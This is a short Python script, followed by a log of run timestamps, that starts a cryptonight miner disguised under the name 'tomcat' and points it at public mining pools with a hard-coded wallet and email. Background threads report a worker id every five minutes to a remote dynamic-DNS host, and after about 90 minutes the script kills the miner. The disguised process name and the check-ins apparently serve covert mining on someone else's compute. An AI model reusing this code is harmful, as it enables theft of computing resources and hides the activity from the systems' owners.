import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:05.582991
#2018-02-17 17:38:04.147097
#2018-02-17 19:26:04.287487
#2018-02-17 21:15:05.666666
#2018-02-17 22:59:01.899431
#2018-02-18 00:47:03.946210
#2018-02-18 02:34:07.245775
#2018-02-18 04:21:04.156946
#2018-02-18 06:13:06.283421
#2018-02-18 08:03:05.431868
#2018-02-18 09:51:01.519996
#2018-02-18 11:37:05.858148
#2018-02-18 13:22:01.562132
#2018-02-18 15:12:06.424791
#2018-02-18 17:01:06.040176
#2018-02-18 18:48:03.407165
#2018-02-18 20:35:01.414553
#2018-02-18 22:20:08.763644
#2018-02-19 00:10:01.777958
#2018-02-19 01:56:03.952234
#2018-02-19 03:42:07.524568
#2018-02-19 05:27:06.907047
#2018-02-19 07:16:05.181797
#2018-02-19 09:04:07.043674
#2018-02-19 10:52:06.112242
#2018-02-19 12:42:01.651504
#2018-02-19 14:28:09.441848
#2018-02-19 16:18:04.314087
#2018-02-19 18:05:09.205894
#2018-02-19 19:53:05.551851
#2018-02-19 21:42:05.590906
#2018-02-19 23:28:05.668026
#2018-02-20 01:13:07.127531
#2018-02-20 03:03:04.696143
#2018-02-20 04:48:07.263106
#2018-02-20 06:32:06.596699
#2018-02-20 08:16:06.625016
#2018-02-20 10:01:06.834186
#2018-02-20 11:47:04.280149
#2018-02-20 13:35:06.799856
#2018-02-20 15:18:11.184119
#2018-02-20 17:05:03.028186
#2018-02-20 18:53:02.241932
#2018-02-20 20:41:05.737780
#2018-02-20 22:25:03.135538
#2018-02-21 00:05:08.218203
#2018-02-21 01:51:06.037880
#2018-02-21 03:41:04.932336
#2018-02-21 05:29:05.032429
#2018-02-21 07:17:06.548244
#2018-02-21 09:02:04.146411
#2018-02-21 10:50:10.062075
#2018-02-21 12:36:09.575042
#2018-02-21 15:07:07.795258
#2018-02-21 16:57:14.076566
#2018-02-21 18:46:14.808958
#2018-02-21 20:34:08.139290
#2018-02-21 22:20:02.781055
#2018-02-22 00:09:01.355999
#2018-02-22 01:56:07.468175
#2018-02-22 03:43:01.792915
#2018-02-22 05:30:08.196522
#2018-02-22 07:15:06.642705
#2018-02-22 09:02:04.272180
#2018-02-22 10:50:09.032364
#2018-02-22 12:36:09.416246
#2018-02-22 14:22:09.039868
#2018-02-22 16:10:04.793565
#2018-02-22 17:55:13.353148
#2018-02-22 19:43:08.866998
#2018-02-22 21:35:05.732077
#2018-02-22 23:22:05.950531
#2018-02-23 01:09:01.491176
#2018-02-23 02:55:07.703260
#2018-02-23 04:42:05.199883
#2018-02-23 06:27:04.956261
#2018-02-23 08:16:04.712467
#2018-02-23 10:32:07.819028
#2018-02-23 12:26:01.666479
#2018-02-23 14:15:07.005398
#2018-02-23 16:07:09.425574
#2018-02-23 17:52:05.399898
#2018-02-23 19:39:03.827690
#2018-02-23 21:22:04.557341
#2018-02-23 23:09:07.525165
#2018-02-24 00:57:06.902899
#2018-02-24 02:50:07.468890
#2018-02-24 04:40:04.623534
#2018-02-24 06:24:02.120382
#2018-02-24 08:12:04.026324
#2018-02-24 09:56:01.649169
#2018-02-24 11:51:01.348756
#2018-02-24 13:43:06.077144
#2018-02-24 15:33:06.063157
#2018-02-24 17:27:06.695013
#2018-02-24 19:14:02.155542
#2018-02-24 21:58:04.403498
#2018-02-25 02:28:07.347503
#2018-02-25 06:08:04.457581
#2018-02-25 11:38:04.111838